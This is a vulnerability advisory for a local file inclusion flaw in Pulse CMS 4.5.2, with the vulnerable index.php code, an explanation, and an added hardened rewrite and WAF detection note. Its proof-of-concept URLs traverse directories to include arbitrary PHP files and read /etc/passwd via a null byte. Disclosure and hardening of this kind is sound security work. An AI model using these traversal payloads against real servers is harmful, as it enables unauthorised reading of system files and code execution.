Document Title:
===============
Pulse CMS 4.5.2 - Local File Inclusion

References (Source):
====================
http://ehsansec.ir/advisories/plusecms452-lfi.txt

Release Date:
=============
2016-02-28

Product & Service Introduction:
===============================
Pulse CMS is the easiest way to build and deploy a responsive, content managed website. Since it is a flat file CMS there is no complicated database setup; just copy it to your server and go. (https://www.pulsecms.com/)

Software Link:
==============
http://www.pulsecms.com/download/pulse.zip

Vulnerability Type:
===================
Local File Inclusion

Vulnerability Details:
======================
I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2.

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Vulnerable File & Code:
=======================
index.php

 9  $page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home';
10  $page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8');
11
12  if (preg_match("/\//", $page)){
13      if(file_exists("content/pages/".$page."home.txt")){
14          $page = $page."home";
15      }
16  }
...
27  include("content/pages/$page.txt");

The page name is taken from the "p" parameter and passed to include() with only htmlspecialchars() applied. htmlspecialchars() encodes quotes and angle brackets but leaves "/" and ".." untouched, so the parameter can traverse out of content/pages/.

Proof of Concept (PoC):
=======================
-- Local File Inclusion --
http://localhost/pluse/index.php?p=../../../../YourPHP.php

-- To include other file types, use a null byte --
http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php

Exploit Author:
===============
Ashiyane Digital Security Team
Ehsan Hosseini
http://ehsansec.ir/

Special thanks to:
==================
Bl4ck_mohajem

Contact:
========
hehsan979@gmail.com
info@ehsansec.ir
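The following is an added hardened version of the vulnerable index.php logic, written here for illustration; it is not Pulse CMS code and not the vendor's fix. It assumes the content/pages/ layout described above and the function name resolve_page() is hypothetical. The fix relies on two independent checks: a strict allowlist on the page name (which by itself rejects "/", "..", and NUL bytes), and a realpath() containment check as defence in depth. Note that PHP 5.3.4 and later already reject paths containing NUL bytes in include(), so the null-byte variant of the PoC depends on the PHP version, but the plain traversal works regardless; the allowlist closes both.

```php
<?php
// Added hardened example (not Pulse CMS code): map the "p" parameter to exactly
// one file inside content/pages before it reaches include().

// Content directory; the layout is taken from the advisory's vulnerable code.
define('PAGES_DIR', __DIR__ . '/content/pages');

/**
 * Resolve a requested page name to an absolute path under PAGES_DIR.
 * Returns null for anything that is not a plain page name or does not exist.
 * (Hypothetical helper written for this example.)
 */
function resolve_page(string $requested): ?string
{
    // 1. Allowlist: letters, digits, underscore and hyphen only, bounded length.
    //    This rejects "../", absolute paths, NUL bytes and encoded variants
    //    outright; htmlspecialchars() in the original code does none of that.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $requested)) {
        return null;
    }

    $candidate = PAGES_DIR . '/' . $requested . '.txt';

    // 2. Defence in depth: canonicalise and confirm the resolved file really
    //    lives under PAGES_DIR. realpath() returns false for missing files, so
    //    this also replaces the original file_exists() probe.
    $real = realpath($candidate);
    $base = realpath(PAGES_DIR);
    if ($real === false || $base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $real;
}

$requested = (isset($_GET['p']) && $_GET['p'] !== '') ? (string) $_GET['p'] : 'home';
$path = resolve_page($requested);

if ($path === null) {
    // Unknown or malformed page name: fail closed instead of falling through
    // to include() with attacker-controlled input.
    http_response_code(404);
    exit('Page not found');
}

// The advisory's code uses include() on the .txt file, so that behaviour is
// kept here. If page files never need to execute PHP, readfile($path) is the
// stricter choice: a writable content file then cannot become code.
include $path;
```

Detection note for operators running the unpatched version: requests to index.php whose "p" parameter contains "/", "..", "%2e", or "%00" never correspond to a legitimate page name under this scheme, so a web server or WAF rule matching those patterns on the "p" parameter gives a low-noise signal for traversal attempts.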